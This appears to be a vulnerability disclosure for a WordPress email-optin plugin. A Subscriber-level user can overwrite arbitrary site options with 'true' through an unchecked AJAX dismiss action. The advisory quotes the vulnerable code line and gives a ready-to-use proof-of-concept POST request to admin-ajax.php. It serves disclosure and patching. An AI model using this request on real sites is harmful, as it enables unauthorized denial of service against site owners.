Once the site gets at least 25 conversions using the plugin, a notice will show up on the administration panel, to all logged-in users regardless of their roles. 

By clicking on "Dismiss" button the `fca_eoi_dismiss` AJAX Action is invoked with two parameters: `nonce` and `option`.

The `option` parameter is not sanitized before used in this line of code:

# campaign-monitor-wp/includes/eoi-post-types.php
1938โ”† if ( update_option( $option, 'true' ) ) {

Since there are no additional privilege checks in the AJAX action's callback function, this means an attacker with Subscriber+ role can actually set any WordPress options with the value `true`.

The possibility to use only the `true` value limits the possibility to perform standard attacks like modifying site URL, default role for new users, and so on, but it is easy to use to create a denial of service by overwriting plugins'/themes' or WordPress' own options.

POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69

action=fca_eoi_dismiss&option=<THE OPTION YOU WANT TO SET TO TRUE>&nonce=<YOUR NONCE>